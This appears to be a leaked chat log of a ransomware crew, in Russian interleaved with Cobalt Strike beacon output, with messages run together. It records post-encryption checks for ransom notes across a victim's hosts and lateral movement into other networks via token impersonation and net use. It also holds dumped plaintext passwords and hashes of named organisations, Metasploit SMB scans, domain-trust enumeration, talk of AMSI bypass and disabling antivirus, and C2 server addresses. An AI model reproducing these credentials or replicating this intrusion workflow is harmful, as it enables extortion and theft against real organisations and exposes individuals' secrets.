535b file 12/08/2020 20:24:33 BOOTNXT.HWOEU
16gb file 11/13/2018 11:25:20 pagefile.sys
1kb file 12/08/2020 20:24:33 readme.txt
``сними список дк проверь ихя щас на azuredcдк доступен?
beacon> ls \\dhcp02\c$
[*] Tasked beacon to list files in \\dhcp02\c$
[+] host called home, sent: 29 bytes
[*] Listing: \\dhcp02\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 04/22/2016 01:52:17 $Recycle.Bin
dir 12/08/2020 23:09:27 clu
dir 12/08/2020 23:09:27 compaq
dir 12/09/2020 11:37:37 Config.Msi
dir 12/08/2020 23:09:27 cpqsystem
dir 08/22/2013 08:48:41 Documents and Settings
dir 12/08/2020 23:09:27 hp
dir 08/22/2013 09:52:33 PerfLogs
dir 12/08/2020 23:09:27 Program Files
dir 12/09/2020 02:49:13 Program Files (x86)
dir 12/09/2020 12:55:15 ProgramData
dir 12/08/2020 23:09:22 System Volume Information
dir 12/08/2020 23:09:27 Users
dir 09/21/2020 10:12:03 Windows
dir 12/08/2020 23:09:27 zabbix_agent
389kb file 09/30/2013 15:37:02 bootmgr
535b file 12/08/2020 23:09:27 BOOTNXT.HWOEU
5kb file 12/08/2020 23:09:27 cpqsprt.trace.HWOEU
3gb file 06/01/2020 10:32:41 pagefile.sys
23kb file 12/08/2020 23:09:27 PHH_wirless2.txt.HWOEU
1kb file 12/08/2020 23:09:27 readme.txt
40mb file 12/09/2020 08:06:26 redcloak.msi
3kb file 12/08/2020 23:09:27 smh_installer.log.HWOEU
615b file 12/08/2020 23:09:27 zabbix_agentd.log.HWOEU
beacon> ls \\kms\c$
[*] Tasked beacon to list files in \\kms\c$
[+] host called home, sent: 26 bytes
[*] Listing: \\kms\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 09/15/2018 01:19:00 $Recycle.Bin
dir 03/30/2020 09:58:18 Documents and Settings
dir 05/29/2020 10:17:56 PerfLogs
dir 12/08/2020 20:58:12 Program Files
dir 12/08/2020 20:58:12 Program Files (x86)
dir 12/08/2020 20:58:12 ProgramData
dir 12/08/2020 20:58:12 Recovery
dir 12/08/2020 20:58:07 System Volume Information
dir 12/08/2020 20:58:12 Users
dir 05/29/2020 10:17:57 Windows
1gb file 05/29/2020 10:18:36 pagefile.sys
1kb file 12/08/2020 20:58:12 readme.txt
beacon> ls \\hyperv24\c$
[*] Tasked beacon to list files in \\hyperv24\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\hyperv24\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 12/08/2020 22:10:00 Avamar
dir 11/06/2020 08:02:07 ClusterStorage
dir 11/05/2020 16:57:08 Documents and Settings
dir 11/06/2020 07:32:25 PerfLogs
dir 12/08/2020 22:10:00 Program Files
dir 12/09/2020 09:05:16 Program Files (x86)
dir 12/08/2020 22:10:00 ProgramData
dir 12/08/2020 22:10:00 Recovery
dir 12/08/2020 22:09:56 System Volume Information
dir 12/09/2020 09:04:58 Users
dir 11/06/2020 07:55:21 Windows
dir 12/08/2020 22:10:00 Zabbix_Agent
839b fil 12/08/2020 22:10:00 NWT_hotfix_report.html.HWOEU
526kb file 12/08/2020 22:10:00 NWT_Install.log.HWOEU
384kb file 12/08/2020 22:10:00 NWT_Nimble_DSM_Install.log.HWOEU
19gb file 11/06/2020 07:57:46 pagefile.sys
1kb file 12/08/2020 22:10:00 readme.txt
40mb file 12/09/2020 08:06:26 redcloak.msi
```проверил 3 везде ридми естьа проверьте что нибудь соседнее под кредами ДАок)всемвсем или тем у кого затык на текущих?давненько у нас с вами такого формата не было)у вас около 1.5 часов еще на работу по текущим, потом выдам доступы в кобу и оттуда уже будем снова разбирать в работу``
Size Type Last Modified Name
---- ---- ------------- ----
dir 10/09/2020 09:34:10 $Recycle.Bin
dir 07/10/2020 13:27:44 Documents and Settings
dir 12/08/2020 23:33:21 Packages
dir 07/10/2020 12:14:14 PerfLogs
dir 12/08/2020 23:33:21 Program Files
dir 12/09/2020 08:44:13 Program Files (x86)
dir 12/08/2020 23:33:21 ProgramData
dir 12/08/2020 23:33:21 Recovery
dir 12/08/2020 23:33:16 System Volume Information
dir 12/08/2020 23:33:21 Users
dir 07/21/2020 11:40:36 Windows
dir 07/2020 14:24:04 WindowsAzure
380kb file 11/21/2016 00:36:43 bootmgr
535b file 12/08/2020 23:33:21 BOOTNXT.HWOEU
1kb file 12/08/2020 23:33:21 readme.txt
```ридми есть[ ](https://mediaeveryone.com/channel/general?msg=yaydbDsTYtNmBckJn) а проверь корень диска Снету у меня, вообще всё пусто, очистил недавно кобуоднаа у вас в sisd много живых сессий?судя по китайской cmd далеко трафик летит)у сесси кста при слипе 5 отклик минутане пробовалвсе мимо или не пробовал?-помимо мс17?ща попробую посканить этот комп на мс17>никто из них неЛА, кредов нетгде?я ж написала по лпе направлению что?[ ](https://mediaeveryone.com/channel/general?msg=7i8e3ue3CvTy5Mhti) в общем здесь все пользователи на одном компе, никто из них не ЛА, домен не отзывается, конфигов впн нет, шар нет, кредов нетпока нетВопрос - можно кобу почистить от sisd.net сессий?[ ](https://mediaeveryone.com/channel/general?msg=zfdbDky5Ae6mwQgxR) окте кто просил впс под мсф - во второй половине дняесли вопросов нет, то приступаем к работедень добрыйВсем приветhiокей)несколько рандомных проверил - даридми появился на армах?```
Сервера
Всего серверов по ад - 69
Живых - 50
Закрыто - 47 (нет дисков, шар,3389)
Сфера - снапшоты потерты
Армы
Всего по ад - 322
Живых - 140
Закрыто - 118
```положите финальную стату последним сообщениема на армах кст появилась)1.done.korbel.com@tl1 закрывай тут всену и ладно
что могли - сделалида добито уже все)да
думаю все
добивайте если что живое осталось и ДКумерла сеть скорее всегопо ls
до того как отвались - везде была записка``
Teemo[COLODC1]daniel.harvey_adm */3192|20Dec23 05:03:27> make_token KORBEL\ben.mandeville 1234qwerASDF!@#$
[*] Tasked beacon to create a token for KORBEL\ben.mandeville
[+] host called home, sent: 56 bytes
[+] Impersonated KORBEL\daniel.harvey_adm
Teemo[COLODC1]daniel.harvey_adm */3192|20Dec23 05:03:34> ls \\10.10.13.14\C$
[*] Tasked beacon to list files in \\10.10.13.14\C$
[+] host called home, sent: 34 bytes
[-] could not open \\10.10.13.14\C$\*: 53
``на крайняк псек)на всякий случай чекда неттам рпс не доступен, вмик же тоже не будет работатьа вмик?)ну вот это и не рабоает)tasklist /v /s hostipвисит лиа, я думал процесdirls простону ты же под токеном видишь все дискиlsа как проверять то?)
вмик не работаетчтобы по сети добралось доступных шарда и думаю можно запускать с ДК тоже под контекстом ЖИВОГО домен админану тогда перепроверяйте сервера
где "встало" где нет )я рандомные пинганул - все доступны))спать хочешь уже?)shell ping 10.10.1.24 -n 1``
beacon> shell ping -n 10.10.1.24
[*] Tasked beacon to run: ping -n 10.10.1.24
[+] host called home, sent: 49 bytes
[+] received output:
IP address must be specified.
```сделайте репинг по серверам например глянуть че к чемуну посмотрите с ДК где живые тачки осталисьтам и дк живой естьне
есть виаем сессии на серверах живыеили кобу вышибло)либо рубанули траффик на кобальт этота все) они отключили сеть походу)echo 1 > Z:\test.txt?а и да, перепроверте все сервера где сесии умерли быстрокак будто не доступен для записи под контекстом
не понимаюдоступ к контекнту же естьно почему-то анэвэйлбл виситтак значит доступенотработакстати, а dir Z:\ отработает?с прямым указанием кред?он отвалится?ремапните 1и то верно :thinking:```
ls \\10.10.1.181\c$
[*] Tasked beacon to list files in \\10.10.1.181\c$
[+] host called home, sent: 34 bytes
[*] Listing: \\10.10.1.181\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 10/20/20 14:28:47 $Recycle.B
``а как был запрос тогда сейчас?)может потому что после шифровки дк поломалась авторизация и токен слетел?``
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
Unavailable Y: \\10.10.1.181\c$ Microsoft Windows Network
Unavailable Z: \\10.10.15.10\c$ Microsoft Windows Network
The command completed successfully.
beacon> ls \\10.10.1.181\c$
[*] Tasked beacon to list files in \\10.10.1.181\c$
[+] host called home, sent: 34 bytes
[*] Listing: \\10.10.1.181\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 10/20/20 14:28:47 $Recycle.Bin
dir 10/20/2020 20:38:31 Documents and Settings
dir 12/16/2020 12:05:24 inetpub
dir 10/20/2020 15:46:32 PerfLogs
dir 11/30/2020 13:30:25 Program Files
dir 11/30/2020 13:30:26 Program Files (x86)
dir 12/22/2020 12:41:05 ProgramData
dir 10/20/2020 20:38:33 Recovery
dir 11/17/2020 15:49:30 SFTP_Root
dir 10/20/2020 14:04:21 System Volume Information
dir 10/29/2020 16:00:15 Users
dir 11/30/2020 13:21:42 Windows
380kb file 02/02/2018 10:37:03 bootmgr
1b file 07/16/2016 06:18:08 BOOTNXT
2gb file 12/21/2020 13:05:39 pagefile.sys
```а хост доступен вообще?как будто под другим контекстом маунтилисьони почему-то unavailable висят[ ](https://mediaeveryone.com/group/korbel-com?msg=jdyKZby3gt8qryYk9) я про серваки если вдругтак мб не дошло до туда еще?оба без запискиZ / Yна него примаплено 2 дискапосмотрите на хосте SQLчет мимо как-будтовот только замапленные дискихмбэкапы насы?сам проверил везде ls C:\дапроверили ридми?притянули сервера, замапили армы, сделали dllinjectда
все ок??т е вы раскидали, замапили и запустили?все еще пранкуете по анричбл)а ну окей да
они анричбл простода4.2 ?не подтянулись
```
10.10.1.61 -
10.10.1.6 -
10.10.1.60 -
```[ ](https://mediaeveryone.com/group/korbel-com?msg=PyBQTPoGEaL2NFYJj) кобана этом 10.10.1.60 портскан даже не выдаёт, что он живойпосмотрю кое чекиньте доступ в кобальт и дайте айпишники этих 3 серваков которые не притягиваюся и не имеют портов пожалуйстаа 445 135 139 какие то открыты там?да, это kb-temperature.korbel.com
```
>operatingSystem: Windows Server 2016 Standard
```Армы
```
10.10.32.177 - Lost = 4 (100% loss)
10.10.17.28 - Lost = 4 (100% loss)
10.10.32.161 - Lost = 4 (100% loss)
10.10.1.50 - Destination host unreachable
10.10.1.129 - Destination host unreachable
10.20.1.30 - Destination host unreachable
```
Сервер
```
10.10.1.60 - Destination host unreachable
``````
у 3 нет дисков, шар,3389
```
это точно виндовые сервера?```
Сервера
Всего серверов по ад - 69
Живых - 50
Закрыто - 47 ( у 3 нет дисков, шар,3389)
Сфера - снапшоты потерты
Армы
Всего по ад - 322
Живых - 140
Закрыто - 118
``все, закончили``
`Teemo[KORBELDC1]SYSTEM */464|2020Dec23 04:28:53> net share \\10.10.13.14
[Tasked beacon to run net share on 10.10.13.14
[+] host called home, sent: 105058 bytes
[+] received output:
Shares at \\10.10.13.14:
Share name Comment
---------- -------
ADMIN$ Remote Admin
C$ Default share
D$ Default share
IPC$ Remote IPC
print$ Printer Drivers`
``соотв по роадмапу есть действия на это``
10.10.1.6 -
10.10.13.14 -
10.10.1.61 -
```
серваки не притянулись и не мапятся
```
10.10.1.65 -
10.10.32.157 -
10.10.16.58 -
10.10.1.20 -
10.20.1.24 -
10.10.17.63 -
```
а это армы не мапятся@user4
```
10.10.32.153
10.10.4.100
10.10.12.156
10.10.16.238
10.10.12.52
10.10.32.172
10.10.17.54
10.10.16.51
10.10.16.19
10.10.16.39
10.10.16.15
10.10.16.190
10.10.16.165
10.10.32.178
10.10.17.48
10.10.12.156
10.10.1.94
10.10.16.41
10.10.17.47
10.10.16.37
10.10.16.172
10.10.1.135
10.10.16.2
10.10.16.34
10.10.16.43
10.10.17.41
10.10.16.197
10.10.17.38
``@user3
```
10.10.32.149
10.10.17.61
10.10.17.69
10.10.17.39
10.10.16.38
10.10.16.195
10.10.32.145
10.20.2.82
10.10.16.245
10.10.16.48
10.10.16.194
10.10.12.51
10.10.16.64
10.10.32.150
10.10.17.59
10.10.17.38
10.10.16.180
10.10.16.250
10.10.16.21
10.10.17.55
10.10.16.26
10.10.16.55
10.10.1.46
10.10.16.13
10.10.16.3
10.10.16.63
10.10.16.245
10.10.17.49
``@user7
```
10.10.16.29
10.10.16.42
10.10.1.65
10.10.16.7
10.10.17.39
10.10.17.4
10.10.16.230
10.10.12.50
10.9.32.98
10.10.16.166
10.10.32.130
10.10.16.179
10.10.4.38
10.10.32.157
10.10.17.12
10.10.17.22
10.10.16.58
10.10.1.20
10.10.16.181
10.20.1.24
10.10.1.134
10.10.16.49
10.10.17.63
10.10.17.26
10.10.32.130
10.10.12.156
10.10.16.23
10.10.17.44
``@user8
```
10.10.16.88
10.10.32.150
10.10.12.53
10.10.1.81
10.10.16.163
10.10.3.26
10.10.32.154
10.10.16.167
10.10.16.16
10.10.16.170
10.10.16.10
10.10.17.66
10.10.16.17
10.10.16.60
10.10.16.162
10.9.0.2
10.10.17.23
10.10.4.37
10.10.32.177
10.10.17.28
10.10.16.32
10.10.1.50
10.10.32.161
10.10.16.36
10.10.1.129
10.10.16.54
10.20.1.30
10.10.17.18
```армыспасибо))было бы отличнотаску удалить?ок@user9 пожалуйста еще удалите тут дл которую кидали `COGNOSPD`user4
```
10.10.1.105
10.9.1.2
10.9.1.5
10.10.1.98
10.10.1.171
10.10.1.101
10.10.1.100
10.10.1.35
10.10.4.9
10.10.1.188
``````
* Username : daniel.harvey_adm
* Domain : KORBEL
* Password : W3lcome?
* Username : adaudit
* Domain : korbel
* Password : #aud1T#
* Username : ben.mandeville
* Domain : KORBEL
* Password : 1234qwerASDF!@#$
```снапшотов*но это на потомроадмап кстати бы дополнить инфой про дроп бэкапов``
45.126.210.66:22514
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe
```хорошо)[ ](https://mediaeveryone.com/group/korbel-com?msg=LrnbrbomduXzS6viq) пока нет)раз меньше 100 получается тянем в однуне от тебякобуот меня что то требуется?дану что начинаем?а именно?@tl1 не могу на дэдик попасть
`209.222.97.50:10101````
192.168.0.46:5000
192.168.0.46:80
192.168.0.41:515
192.168.0.41:443
192.168.0.41:80
192.168.0.41:139
192.168.0.38:5000
192.168.0.23:443
192.168.0.23:80
192.168.0.17:5900
192.168.0.17:5800
192.168.0.17:5040
192.168.0.17:3389
192.168.0.17:139
192.168.0.17:135
192.168.0.10:139
192.168.0.10:80
192.168.0.1:139
192.168.0.1:80
192.168.0.10:445 (platform: 500 version: 6.1 name: READYSHARE domain: WORKGROUP)
192.168.0.17:445 (platform: 500 version: 10.0 name: ATSALES_RL_LAP domain: AT)
192.168.0.41:445
``````
Teemo[ATSALES_RL_LAP]rlawrence/3100|2021Jan29 20:53:18> shell systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 41 bytes
[+] received output:
Host Name: ATSALES_RL_LAP
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19041 N/A Build 19041
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00330-50315-96784-AAOEM
Original Install Date: 11/10/2020, 7:18:46 PM
System Boot Time: 1/27/2021, 1:42:15 PM
System Manufacturer: LENOVO
System Model: 80SX
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 78 Stepping 3 GenuineIntel ~1800 Mhz
BIOS Version: LENOVO 0ZCN41WW, 9/15/2017
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-07:00) Mountain Time (US & Canada)
Total Physical Memory: 5,864 MB
Available Physical Memory: 1,787 MB
Virtual Memory: Max Size: 9,576 MB
Virtual Memory: Available: 3,440 MB
Virtual Memory: In Use: 6,136 MB
Page File Location(s): C:\pagefile.sys
Domain: AT.LOCAL
Logon Server: \\ATSALES_RL_LAP
Hotfix(es): 7 Hotfix(es) Installed.
[01]: KB4586876
[02]: KB4577266
[03]: KB4580325
[04]: KB4586864
[05]: KB4593175
[06]: KB4598481
[07]: KB4598242
Network Card(s): 3 NIC(s) Installed.
[01]: Qualcomm Atheros QCA9377 Wireless Network Adapter
Connection Name: Wi-Fi
DHCP Enabled: Yes
DHCP Server: 192.168.0.1
IP address(es)
[01]: 192.168.0.17
[02]: Realtek PCIe GBE Family Controller
Connection Name: Ethernet
Status: Media disconnected
[03]: Bluetooth Device (Personal Area Network)
Connection Name: Bluetooth Network Connection
Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Virtualization Enabled In Firmware: No
Second Level Address Translation: Yes
Data Execution Prevention Available: Yes
```
скорее всего ноутбук``
Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:44:02> shell dir C:\Users
[Tasked beacon to run: dir C:\Users
[+] host called home, sent: 43 bytes
[+] received output:
Volume in drive C is Windows
Volume Serial Number is 2C89-5747
Directory of C:\Users
11/10/2020 06:41 PM .
11/10/2020 06:41 PM .
11/10/2020 07:03 PM administrator
11/10/2020 06:55 PM administrator.AT
11/10/2020 06:56 PM administrator.AT.000
11/10/2020 06:57 PM administrator.ATSALES_RL_LAP
11/10/2020 06:54 PM Barfield
11/10/2020 06:58 PM LogMeInRemoteUser
11/10/2020 07:32 PM Public
11/10/2020 06:56 PM RLAWRENCE
11/10/2020 06:58 PM rlawrence.AT
01/27/2021 01:44 PM rlawrence.ATSALES_RL_LAP
0 File(s) 0 bytes
12 Dir(s) 847,083,728,896 bytes free
```
ну доменные пользаки ходят на эту тачкуДА нетувг что ли``
Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:41:44> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Barfield
rlawrence
The command completed successfully.
```сесия опять оффнашёл лишь ярлык ведущий к файлуискал впнадинфо не снял так как домен не доступен былbarfieldinc.com``
MS.Outlook.15:rlawrence@amgusa.org\rlawrence@amgusa.org P@ssword1
portal.us.elephantoutlook.com\rlawrence@amgusa.org P@ssword1
at\rlawrence c35845dac149d05a4fce77de6e0b5ec0
10.0.6.59\at\administrator admin@Barfield
lh_data-server\at\rlawrence P@ssword1
MS.Outlook.15:rlawrence@amgusa.org:PUT\rlawrence@amgusa.org @@CoAAAAAyBAbAEGA3BgcAUGAuBwYAUGAABQYA0GAnBQdAMHAhBgLA8GAyBwZAA
MicrosoftOffice16_Data:SSPI:rlawrence@barfieldinc.com\rlawrence@amgusa.org P@ssword1
ATSALES_RL_LAP\rlawrence c35845dac149d05a4fce77de6e0b5ec0
rlawrence@amgusa.org\rlawrence@amgusa.org P@ssword1
```пока все ссылки проверил сетка отвалилась (ошибочка вышла, `barfieldinc.com` их доменеще разокeyJhbGciOiJBKPo27yB6IVIvIi9wFeTMhPdcUc+V3inOPApoLXYnqa8LymUXCu3TSayjTQAKEHuRdM8P30shXj7gOkrV6hEbhJsvPPeJAR2UMMLK0s8FgbrHIXH/sav//HMOGzk01KZeb9Lm+lURefztW3pyHfnnipoKjYztgR2nQYs7tBiukVz3nu808H3eLJS/edbod3MK47DQ9YtJXvkftAPT9Ng/gdBrvhr/1Cax1JrrjOz2aCeEprkrMiSaJvpAC6YdJ2itxPLj5XmBnVeTEcD/6BNt84K7T77J+IjC+xgE1+a/KuDU3pXyQl9eDvTdLkcoHKZZatUTjsMq2qyUCs+FYQccBia/KZwLNn5gsYSGT1JNWPaFdD2K8oXaGSXstL8lWjZOAy54Ut0h637q9vKJTgJs1jM/KSIYzxDiuNZjgFFTauD6KqwZb2k1XJAdaKFetS2bwARuOeMM49GU0Ft9DUI/0JFZWeTJdpKTHZk6JAFQT7auCYduDiTk+kgl5gtOGpop2Y7oe0MCRa3rj0DQUu3I2Sr3J74TYBRVQP4nP0MrINVV/qbOPowpq/xrN8pOS3Ake9niHHKIM2+r713wwtA/7DHpk6lEtd6JqQH6O7ot04ioxY8xm+DwB1349Cq7NM0AFgvjxOE7jBKHj4NWUwr83LgmYSCK1zyD33xIrXO8gilNwWW755yGAWdVm5325kJ2zY43xmyEmBPHlOvtor78gSX0YyxMkbDh6dIpCypkDT3DH+2cSGPiWtwbIm5cWAFSQ57Jj+fal81kMjlPvGxqUAHnzCKNii8t5IqbZCVr51HgMivb6CfqSWbLmsbBJIx91m5aNC2I0V6nJTjRkELGiD6bG+ex1t91kk33bbRqacA6gmj2D1LZc9590bvmyPereU/K9p2YFhQGxsmEM81Jp6NpvRjhI1dZyjtnfWYHeBlgy+xcF8uxINua9DOwGHhEm5j0ZKM92b7Hg2a8H7Eo/Ksu1J83N+RxOw9oUhUt7h ставлю скан``
beacon> shell net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator
[Tasked beacon to run: net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator
[+] host called home, sent: 86 bytes
[+] received output:
System error 86 has occurred.
The specified network password is not correct.
beacon> shell net use \\10.100.7.16\c$ consolidate_16 /user:Administrator
[Tasked beacon to run: net use \\10.100.7.16\c$ consolidate_16 /user:Administrator
[+] host called home, sent: 90 bytes
[+] received output:
System error 86 has occurred.
The specified network password is not correct.
```не локнуть бы)ну попробуй ЛА дааможно попробовать эти учетки на смб логин``
Administrator:1969C00p3r
Administrator:consolidate_16
```либо есть другие энтерылибо пасс у Администратора разныйи пересечений нетя снял со всех текущих доменов энтеровсе? получилось?энтерпрайсы и вми сервис локальные админы на ДК``
PDC
Alias name administrators
Comment Members can fully administer the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================
``````
DEN-DCON-02.na.panavision.com [DS] Site: Denver
DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver
WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills
The command completed successfully
=============================================
PDC
Alias name administrators
Comment Members can fully administer the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
#yromero adfs.admin Administrator
BackupMgr CZambrana_da exponential
it.deploy it.inventory jharris_da
mpatterson_ea orivera_da PKooiman_da
sanadmin SP_Admin SQLAgent
windchilladmin yromero_ea
pvna\#yromero V@ndals1974
=============================================
``эмм``
beacon> shell ping -n 1 panavision.com
[*] Tasked beacon to run: ping -n 1 panavision.com
[+] host called home, sent: 55 bytes
[+] received output:
Pinging panavision.com [10.100.7.16] with 32 bytes of data:
Reply from 10.100.7.16: bytes=32 time<1ms TTL=126
Ping statistics for 10.100.7.16:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
``это нужный домен?технологии...он даже аптайм показывает``
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 11h 49m 56s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051}) (authentication domain:PVRT)
[+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (domain:PVRT)
[*] 10.100.7.16: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```я со времен армы вообще не трогала ты давно сканил через смб вершн?откуда эта теория?)))а я думал что видимость днс это аналог трастану так в чем проблема?его походу все видятSYD-WSUS-01``
DNS Suffix Search List. . . . . . : ap.panavision.com
na.panavision.com
panavision.com
eu.panavision.com
sa.panavision.com
```скан щас поставлюа тут общих ДА на сколько помнюпоробовать туда креды ДА с "тем" доменомнайти там тачкинадо отсканить на смб_вершн диапазони всепросто эти машины "видят" доменты страный какой-то
схуяли видимоть ДНСа траст должна давать?чувак)бляне понимаю``
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/15-00:51:44 GMT Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)]
>trustAttributes: 4 [Quarantined-Domain(4)]
``или стопбля а реально он тут довереный``
dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com
>whenCreated: 2006/01/16-23:54:35 GMT Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]
```вернораз у них днс довереныйага ну т е он общается с карантиным доменом``
DNS Suffix Search List. . . . . . : ap.panavision.com
na.panavision.com
panavision.com
eu.panavision.com
sa.panavision.com
``вон сабнет карантиненного доменаэто с EUR-DCON-01``
Pinging panavision.com [10.100.7.16] with 32 bytes of data:
```видишь?``
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:
Windows IP Configuration
Host Name . . . . . . . . . . . . : AUS-DCON-01
Primary Dns Suffix . . . . . . . : ap.panavision.com
Node Type. . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : ap.panavision.com
na.panavision.com
panavision.com
eu.panavision.com
sa.panavision.com
``надо``
Host Name: EUR-WSUS-16
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00377-60000-00000-AA934
Original Install Date: 10/4/2018, 4:40:38 PM
System Boot Time: 9/12/2020, 7:25:46 PM
System Manufacturer: Microsoft Corporation
System Model: Virtual Machine
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2400 Mhz
BIOS Version: Microsoft Corporation Hyper-V UEFI Release v1.0, 11/26/2012
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 8,095 MB
Available Physical Memory: 4,448 MB
Virtual Memory: Max Size: 9,375 MB
Virtual Memory: Available: 5,468 MB
Virtual Memory: In Use: 3,907 MB
Page File Location(s): C:\pagefile.sys
Domain: eu.panavision.com
Logon Server: N/A
Hotfix(es): 18 Hotfix(es) Installed.
[01]: KB3192137
[02]: KB4091664
[03]: KB4132216
[04]: KB44659
[05]: KB4485447
[06]: KB4498947
[07]: KB4503537
[08]: KB4509091
[09]: KB4512574
[10]: KB4520724
[11]: KB4521858
[12]: KB4524244
[13]: KB4540723
[14]: KB4550994
[15]: KB4562561
[16]: KB4565912
[17]: KB4576750
[18]: KB4577015
Network Card(s): 1 NIC(s) Installed.
[01]: Microsoft Hyper-V Network Adapter
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.32.1.41
IP address(es)
[01]: 192.168.33.101
[02]: fe80::f831:9a12:366d:1ed6
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```а во
айпиконфигдай весь вывод системнифо``
[01]: Microsoft Hyper-V Network Adapter
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.32.1.41
IP address(es)
[01]: 192.168.33.101
[02]: fe80::f831:9a12:366d:1ed6
``````
[01]: Microsoft Hyper-V Network Adapter
Connection Name: Ethernet
DHCP Enabled: No
IP address(es)
[01]: 192.168.1.85
[02]: fe80::188e:a234:ce85:3eb7
``если хочешь могу дать тебе доступ сам потыкаешьно прикол в том, что его собственная нагрузка определятся как малварь)))вобще суть его в том, что он обходит амси и позволяет через себя модули типо мимика запускатьи как он кстати?ну просто в системинфо глянья развернул тот поверхабкстатиа как еще снимать днсы я хз)а я поэтому и скинул тебе что папки dns нет и как и утилиты)там где НЕТ днс сервера?)))что не снимешь днс записину логически то ты же понимаешьтак ты и сказал мол сними днс я только об этом и знаю)итдпосмотри кто логинился на сервак (если там с других доменов кто был - будет видно)и посмотри какие там ндсы будут блин)сделайsysteminfoчто ты дампить пытаешься?)это ж не днс сервера че за хуйню ты делаешь?что теперь делаем?папки DNS нигде нет, dnscmd тоже не нашло в system32``
beacon> shell dnscmd /enumzones > AllZones.txt
[*] Tasked beacon to run: dnscmd /enumzones > AllZones.txt
[+] host called home, sent: 63 bytes
[+] received output:
'dnscmd' is not recognized as an internal or external command,
operable program or batch file.
``````
beacon> shell dir C:\windows\system32\dns
[*] Tasked beacon to run: dir C:\windows\system32\dns
[+] host called home, sent: 58 bytes
[+] received output:
Volume in drive C has no label.
Volume Serial Number is 5C94-6AB3
Directory of C:\windows\system32
File Not Found
``ну если он через сервисы вырубается то можно массово будет батником хуйнуть какие проблемыно надо на каждом пк откл как ты понимаешьа он через сервисы еще отключаетсяадминку надо от фаерая найти будет...```
Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data:
Reply from 192.168.33.101: bytes=32 time=157ms TTL=251
Ping statistics for 192.168.33.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 157ms, Maximum = 157ms, Average = 157ms
Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data:
Reply from 192.168.1.85: bytes=32 time=204ms TTL=251
Ping statistics for 192.168.1.85:
